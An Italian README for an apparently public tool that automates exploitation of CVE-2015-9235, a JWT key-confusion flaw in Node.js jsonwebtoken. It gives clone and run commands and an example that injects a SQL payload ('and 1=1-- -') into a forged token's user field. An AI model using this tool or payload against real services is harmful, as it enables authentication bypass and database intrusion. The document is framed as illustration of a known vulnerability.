
Automatizza lo sfruttamento di CVE-2015-9235
Clona o scarica il codice sorgente dell'applicazione.
git clone https://github.com/WinDyAlphA/CVE-2015-9235_JWT_key_confusion
cd CVE-2015-9235_JWT_key_confusion
Il file token.txt contiene un token JWT valido come esempio. Puoi modificarlo o sostituirlo con il tuo token.
Esegui l'applicazione tramite la riga di comando con gli argomenti appropriati:
python main.py -t token_path -k key_to_replace -v new_value
-t o --token: Il percorso del file contenente il token JWT originale.
-k o --key: La chiave da sostituire nel token.
-v o --value: Il nuovo valore da associare alla chiave.
L'applicazione mostrerà il nuovo token JWT con la chiave aggiornata.
python main.py -t token.txt -k user -v "thierry23' and 1=1-- -"
Questa applicazione è stata creata per illustrare una vulnerabilità di sicurezza nota come CVE-2015-9235.
Nel modulo jsonwebtoken per Node.js prima della versione 4.2.2, un attaccante può bypassare la verifica quando un token è firmato con una chiave asimmetrica (famiglia RS/ES) di algoritmi, ma invia invece un token firmato con un algoritmo simmetrico (famiglia HS*).